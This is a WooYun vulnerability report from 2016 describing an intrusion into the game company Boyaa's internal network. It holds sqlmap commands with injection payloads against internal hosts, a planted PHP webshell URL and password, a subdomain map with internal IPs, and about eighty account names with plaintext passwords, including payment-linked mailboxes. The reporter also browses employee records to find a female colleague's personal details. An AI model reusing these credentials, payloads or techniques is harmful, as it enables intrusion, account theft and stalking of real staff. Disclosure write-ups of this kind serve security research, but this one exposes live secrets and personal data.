当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2016-0171420

漏洞标题:博雅互动内网漫游

相关厂商:boyaa.com

漏洞作者: hecate

提交时间:2016-01-20 18:26

修复时间:2016-03-05 09:52

公开时间:2016-03-05 09:52

漏洞类型:成功的入侵事件

危害等级:高

自评Rank:20

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2016-01-20: 细节已通知厂商并且等待厂商处理中
2016-01-20: 厂商已经确认,细节仅向厂商公开
2016-01-30: 细节向核心白帽子及相关领域专家公开
2016-02-09: 细节向普通白帽子公开
2016-02-19: 细节向实习白帽子公开
2016-03-05: 细节向公众公开

简要描述:

我和另一个人同时胡一张牌,为什么只能他胡,而我不能胡牌
四川麻将是两个人可以同时胡一张牌啊,游戏里面怎么不行呢 ╮(╯▽╰)╭

详细说明:

1.清一色胡牌

cbb2cc234ac4e7b0bc803871fed58958.jpeg


2.扫描boyaa.com子域名,发现svn源代码泄露

http://notice.boyaa.com/.svn/entries


导致整站源代码可下载

123.png


在/application/libraries/ByoaaMail.php文件中发现邮箱密码信息

124.png


3.登录邮箱

126.png


收件箱神马都没有,先拖出通讯簿里所有用户,以便后续渗透

125_meitu_1.jpg


上个星期用拼音字典爆破了一下没有结果,原来贵公司用户名全英文啊,账户体系控制挺严,但是一个svn泄露就可能使内网沦陷
4.利用收集到的英文用户名对邮箱进行精细化fuzzing, 最后只得到一个结果

https://mail.boyaa.com
TonyTan boyaa@2015


邮箱里面没找到密码信息,只找到vpn登录地址 https://sslvpn.boyaa.com
5.登录vpn,进入内网

22.png


oa系统

33.png


在个人资料页存在越权
这是我登录的个人信息http://basic.oa.com/user/myInfo/495
修改后面的id就看到了ceo的高清果照 http://basic.oa.com/user/myInfo/1

54_meitu_1.jpg


对ceo不感兴趣 然后继续改id,看看有木有漂亮的女汉子,终于找到一个

ee_meitu_2.jpg


看来oa.com域名只对内网解析,接着使用挖掘机挖出了oa.com的子域名

oa.com   192.168.97.40   nginx
www.oa.com 192.168.97.40 nginx
d.oa.com 175.45.5.224 nginx
r.oa.com 119.81.169.172 nginx
t.oa.com 208.43.166.72 nginx
h5.oa.com 192.168.202.87 nginx/1.6.3
cms.oa.com 192.168.97.56 nginx
blog.oa.com 192.168.203.226 nginx
ai.oa.com 192.168.202.92 nginx
app.oa.com 192.168.203.222 nginx
apk.oa.com 192.168.201.168 nginx
api.oa.com 192.168.97.55 webserver
feedback.oa.com 173.192.176.203 nginx
ab.oa.com 124.238.249.19 webserver
bbs.oa.com 192.168.97.55 webserver
mobile.oa.com 192.168.97.10 nginx
m.oa.com 218.213.244.148 webserver
my.oa.com 192.168.97.55 webserver
admin.oa.com 58.83.134.23 nginx
shop.oa.com 192.168.97.56 nginx
server.oa.com 175.45.32.169 nginx
360.oa.com 192.168.97.55 webserver
video.oa.com 192.168.203.216 webserver
pay.oa.com 192.168.201.65 nginx
pm.oa.com 192.168.97.55 webserver
tool.oa.com 192.168.97.56 nginx
jiankong.oa.com 175.45.32.169 nginx
kf.oa.com 192.168.97.56 nginx
monitor.oa.com 192.168.97.55 webserver
mysql.oa.com 175.45.32.169 nginx
file.oa.com 192.168.97.55 webserver
cacti.oa.com 10.10.100.252 nginx
auth.oa.com 192.168.97.56 nginx
cd.oa.com 192.168.200.171 nginx
channel.oa.com 175.45.5.224 nginx
zabbix.oa.com 210.5.191.169 nginx
data.oa.com 210.5.191.165 nginx
dc.oa.com 175.45.5.223 nginx
svn.oa.com 192.168.97.36 webserver
dev.oa.com 192.168.200.171 nginx
ct.oa.com 124.238.246.43 webserver


对子域名进行扫描发现多个注入点,真是呵呵哒~

①一个wiki系统,没有打补丁
sqlmap -u "http://iddz.oa.com/lywiki/index.php?edition-compare-1" --data "eid[0]=2&eid[1]=19&eid[2]=-3" -p 'eid[2]' --dbs
---
Parameter: eid[2] (POST)
Type: AND/OR time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (SELECT)
Payload: eid[0]=2&eid[1]=19&eid[2]=-3) AND (SELECT * FROM (SELECT(SLEEP(5)))VOBE) AND (9817=9817
---
[16:02:21] [INFO] the back-end DBMS is MySQL
back-end DBMS: MySQL 5.0.12
available databases [14]:
[*] `test`
[*] apk_bk
[*] apk_control
[*] apk_multi
[*] apk_test
[*] dfwiki
[*] feedback
[*] information_schema
[*] landlord_bbs
[*] landlord_weixin
[*] mysql
[*] phpdoc
[*] reqm
[*] wiki
②公司月收入好高,数不过来了

56565.png


http://payadmin.oa.com/Interface/index.php?act=getordersfast&mod=order&sid=4&pstatus=2&pstarttime=2016-01-01%2000:00:00&pendtime=2016-01-17%2021:28:35&page=1&_=1453037657253 (GET)
---
Parameter: sid (GET)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: act=getordersfast&mod=order&sid=4 AND 1894=1894&pstatus=2&pstarttime=2016-01-01 00:00:00&pendtime=2016-01-17 21:28:35&page=1&_=1453037657253
---
back-end DBMS: MySQL >= 5.0.0
available databases [4]:
[*] information_schema
[*] payadmin
[*] paycenter
[*] test
③知识分享平台
http://kms.oa.com/search.php (POST)
searchtype=0&search=*
---
Parameter: #1* ((custom) POST)
Type: boolean-based blind
Title: MySQL AND boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause (MAKE_SET)
Payload: searchtype=0&search='||(SELECT 'kyPd' FROM DUAL WHERE 8817=8817 AND MAKE_SET(5450=5450,9465))||'
Type: error-based
Title: MySQL >= 5.1 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (EXTRACTVALUE)
Payload: searchtype=0&search='||(SELECT 'ilev' FROM DUAL WHERE 8590=8590 AND EXTRACTVALUE(8847,CONCAT(0x5c,0x716a717171,(SELECT (ELT(8847=8847,1))),0x716b787071)))||'
Type: AND/OR time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (SELECT)
Payload: searchtype=0&search='||(SELECT 'rJQv' FROM DUAL WHERE 3017=3017 AND (SELECT * FROM (SELECT(SLEEP(5)))scaf))||'
---
back-end DBMS: MySQL 5.1
available databases [3]:
[*] by
[*] information_schema
[*] test


④单点登录系统存在注入,这就致命了

http://sso.oa.com/Admin/handleattent (POST)
do=cancleAttent&gid=1
这里过滤了 > 符号,使用between绕过
sqlmap -u 'http://sso.oa.com/Admin/handleattent' --data 'do=cancleAttent&gid=1' --cookie='' --tamper between.py
available databases [4]:
[*] information_schema
[*] sso
[*] test_sso
[*] test

sso.oa.com_meitu_1.jpg


1902个员工的账号+MD5+电话,时间盲注太慢,年过完了都跑不完,所以就不跑了


⑤会议系统
http://meet.oa.com/ajax.php?cmd=init&mtstart=1453046400&mtend=1453564800 (GET)
Parameter: mtstart (GET)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: cmd=init&mtstart=1453046400' AND 6701=6701 AND 'oVIF'='oVIF&mtend=1453564800
Type: UNION query
Title: MySQL UNION query (56) - 10 columns
Payload: cmd=init&mtstart=1453046400' UNION ALL SELECT 56,56,56,CONCAT(0x71767a6a71,0x4b586b486b7566744a5a457871646156747667716c79767061545068737a5244416e47756b596f43,0x716a627071),56,56,56,56,56,56#&mtend=1453564800
---
back-end DBMS: MySQL 5
available databases [6]:
[*] cms
[*] information_schema
[*] list
[*] list_tasklogs
[*] list_tasksext
[*] test


运维管理系统 http://sa.oa.com

66_meitu_1.jpg


这么多服务器,我一个人岂不累死?对了,这次目的是为了找妹子的联系方式
找啊找,找到一处任意文件上传

http://it.oa.com/needs_apply/index?typeId=3&type=opm&yw=0&rand=692548803


789_meitu_1.jpg


ttt_meitu_2.jpg


上传附件处传个php上去getshell

yy_meitu_4.jpg


里面好多sql文件,其中这个文件保存有全公司员工的信息

777_meitu_3.jpg


CREATE TABLE IF NOT EXISTS `pb_user` (
`id` int(10) unsigned NOT NULL COMMENT '工号',
`cname` varchar(45) NOT NULL COMMENT '中文姓名',
`username` varchar(45) NOT NULL COMMENT '英文名,rtx账号',
`sex` tinyint(1) unsigned NOT NULL DEFAULT '0' COMMENT '性别,0:未知 1:男 2:女',
`btype` tinyint(1) unsigned DEFAULT '0' COMMENT '生日类别, 0:阳历 1:阴历',
`birthday` date DEFAULT NULL COMMENT '出生年月日',
`bhour` varchar(10) DEFAULT NULL COMMENT '出生时辰',
`nation` tinyint(2) unsigned DEFAULT '0' COMMENT '民族',
`edate` date NOT NULL COMMENT '入职日期',
`cdate` date DEFAULT NULL COMMENT '转正日期',
`groupid` int(10) unsigned NOT NULL DEFAULT '0' COMMENT '组织架构,对应pb_group表里的id',
`position` int(10) unsigned DEFAULT '0' COMMENT '岗位,,对应pb_position表的id',
`mposition` int(10) unsigned DEFAULT '0' COMMENT '管理职位,对应pb_option表的id',
`rank` varchar(50) DEFAULT NULL COMMENT '职级',
`idtype` tinyint(1) unsigned DEFAULT '0' COMMENT '证件类型, 对应option表',
`idnumber` varchar(30) DEFAULT NULL COMMENT '证件号码',
`idsdate` date DEFAULT NULL COMMENT '身份证有效期开始日期',
`idedate` date DEFAULT NULL COMMENT '身份证有效期结束日期',
`idaddress` varchar(255) DEFAULT NULL COMMENT '身份证地址',
`utype` int(10) unsigned NOT NULL DEFAULT '0' COMMENT '员工类别,对应pb_option表里的id',
`location` varchar(45) DEFAULT NULL COMMENT '户口所在地',
`census` int(10) NOT NULL DEFAULT '0' COMMENT '户籍',
`hometown` varchar(20) DEFAULT NULL COMMENT '籍贯',
`ismarray` tinyint(1) unsigned DEFAULT '0' COMMENT '婚否,0:未婚 1:已婚',
`bank` int(10) unsigned DEFAULT '0' COMMENT '开户银行,对应pb_option表里的id',
`bnumber` varchar(20) DEFAULT '0' COMMENT '银行账号',
`ssnumber` varchar(20) DEFAULT '0' COMMENT '社保电脑号',
`reserve` varchar(20) DEFAULT '0' COMMENT '公积金账号',
`company` int(10) unsigned NOT NULL DEFAULT '0' COMMENT '所属公司,对应pb_option表里的id',
`htsdate` date DEFAULT NULL COMMENT '合同开始日期',
`htedate` date DEFAULT NULL COMMENT '合同结束日期',
`tutor` int(10) unsigned DEFAULT '0' COMMENT '导师工号',
`boss` int(10) unsigned NOT NULL DEFAULT '0' COMMENT '直属上级工号',
`phone` varchar(30) DEFAULT NULL COMMENT '联系电话',
`email` varchar(50) DEFAULT NULL COMMENT '邮箱',
`address` varchar(255) DEFAULT NULL COMMENT '现在居住地址',
`emerman` varchar(25) DEFAULT NULL COMMENT '紧急联系人',
`emerphone` varchar(20) DEFAULT NULL COMMENT '紧急联系人电话',
`homephone` varchar(20) DEFAULT NULL COMMENT '家庭联系电话',
`jobtime` date DEFAULT NULL COMMENT '参加工作时间',
`lastjob` varchar(50) DEFAULT NULL COMMENT '上家工作单位',
`wcity` int(10) unsigned DEFAULT '0' COMMENT '工作城市,对应pb_potion表里id',
`assignment` int(10) unsigned DEFAULT '0' COMMENT '所属外派机构,对应pb_potion表里id',
`status` int(1) NOT NULL DEFAULT '0' COMMENT '员工状态, 0 待入职 1 在职 2 离职 3.退休',
`ltype` int(10) unsigned DEFAULT '0' COMMENT '离职类型,对应pb_option表里id',
`lreason` int(10) unsigned DEFAULT '0' COMMENT '离职原因,对应pb_option表里的id',
`ldate` date DEFAULT NULL COMMENT '离职日期',
`trial` tinyint(1) unsigned DEFAULT '0' COMMENT '试用期限,比如:3表示3个月 6表示6个月',
`remark` text COMMENT '备注',
`annex` text COMMENT '附件,比如:毕业证 身份证 离职证明的上传附件',
`sort` int(10) unsigned DEFAULT '1000' COMMENT '排序',
`key_person` tinyint(1) unsigned NOT NULL DEFAULT '2' COMMENT '是否是基干, 1:基干 2:普通员工',
`school` varchar(100) DEFAULT NULL COMMENT '毕业院校',
`degree` int(10) unsigned DEFAULT '0' COMMENT '学历,对应pb_option表里id',
`specialty` varchar(100) DEFAULT NULL COMMENT '专业',
`gdate` date DEFAULT NULL COMMENT '毕业日期',
`photo` varchar(255) DEFAULT NULL COMMENT '用户头像',
`non_competition` tinyint(1) NOT NULL DEFAULT '0' COMMENT '竞业限制, 0:否 1:是',
`competition_exec` tinyint(1) unsigned NOT NULL DEFAULT '0' COMMENT '是否执行竞业协议',
`marry_date` int(10) NOT NULL DEFAULT '0' COMMENT '结婚纪念日',
`hobby` varchar(200) NOT NULL DEFAULT '' COMMENT '爱好',
`speciality` varchar(200) NOT NULL DEFAULT '' COMMENT '特长',
`jtype` int(10) NOT NULL DEFAULT '0' COMMENT '招聘类型:对应option表id',
`recom_person` varchar(15) DEFAULT '' COMMENT '推荐人',
`ulimit` tinyint(1) NOT NULL DEFAULT '1' COMMENT '1:正常工号 2:系统工号 3:客服 4:泰分',
`addtime` int(10) unsigned NOT NULL COMMENT '记录添加时间',
`edittime` int(10) unsigned NOT NULL COMMENT '记录最后更新时间',
PRIMARY KEY (`id`),
UNIQUE KEY `username` (`username`),
KEY `fk_pb_user_pb_group1_idx` (`groupid`),
KEY `fk_pb_user_pb_position1_idx` (`position`)
) ENGINE=MyISAM DEFAULT CHARSET=utf8 COMMENT='员工基础信息表';


快速定位目标妹子

ee_meitu_2.jpg


妹子的什么信息都有了,嘿嘿嘿,但是我这么穷,妹子怎么愿意和我做朋友呢?
6.整理出sql文件里面的username和先前邮箱里拖出来的用户名进行 B∪(A∩B)的运算得到总共2000多用户名,再一次对邮箱进行fuzzing得到下面这个账号

KevinPan        Boyaa123456


这个账号邮箱里面让我找到了贵公司的通用密码

RhiciaWirianto	123qwe!!
KritsanaAumkham 123qwe!!
NirachaJunsri 123qwe!!
DomZhang 123qwe!!
AmyWen 123qwe!!
songweijian 123qwe!!
SevenYang 123qwe!!
JoannaWen 123qwe!!
SisiTian 123qwe!!
SamHe 123qwe!!
FlytonyChai 123qwe!!
Vickyzhzhou 123qwe!!
MiniShan 123qwe!!
SevenChen 123qwe!!
SalinChen 123qwe!!
XianGuo 123qwe!!
VenusXia 123qwe!!
DieselWang 123qwe!!
AnnaChen 123qwe!!
KajonSak 123qwe!!
LucknaRa 123qwe!!
AmpornChai 123qwe!!
TalorWang 123qwe!!
KamilMika 123qwe!!
android.en 123qwe!!
android.ru 123qwe!!
Vip009 123qwe!!
Vip001 123qwe!!
ios.en 123qwe!!
ios.id 123qwe!!
ipokeraws1 123qwe!!
ipokeraws2 123qwe!!
kop 123qwe!!
Thanaya qwe123!!
Tunyada 123qwe@@
Suthinee 123qwe@@
Sirion 123qwe@@
Monrat 123qwe@@
Noppachai 123qwe@@
RockZong 123qwe@@
iPoker 123qwe@@
CrazyBull 123qwe@@
Cameracs 123qwe@@
SophieYu qwe123@@
MoroDeng 123qwe##
boyaa-halink 456qwe!!
paycenter_share 456qwe!!
Wiroonrat 456qwe!!
Alert 456qwe!!
alipay 456qwe!!
android.it 456qwe!!
android.jp 456qwe!!
apple1 456qwe!!
apple1test 456qwe!!
apple2 456qwe!!
apple2test 456qwe!!
appletest 456qwe!!
vip.it 456qwe!!
Vip008 456qwe!!
boyaa-tw360 456qwe!!
financetest 456qwe!!
ios.ar 456qwe!!
offer10 456qwe!!
offer6 456qwe!!
offer7 456qwe!!
offer8 456qwe!!
offer9 456qwe!!
Vip.fr 456qwe!!
slavegame 456qwe!!
Vip007 456qwe!!
Vip002 456qwe!!
wp.pt 456qwe!!
ios.it 456qwe!!
ios.jp 456qwe!!
iloveddz 456qwe!!
alarm 456qwe!!
PerformanceTesting 789qwe!!
Chalermchai 789qwe!!


其中

alipay		456qwe!!
apple1 456qwe!!


是支付宝绑定邮箱,每时每刻都有¥¥进账

999_meitu_1.jpg

漏洞证明:

rere.jpg


http://it.oa.com/uploadfile/1453091956-27117.php
密码 wooyun

修复方案:

支付宝绑定的邮箱密码要复杂点才好

版权声明:转载请注明来源 hecate@乌云


漏洞回应

厂商回应:

危害等级:高

漏洞Rank:18

确认时间:2016-01-20 18:29

厂商回复:

感谢 正在处理

最新状态:

暂无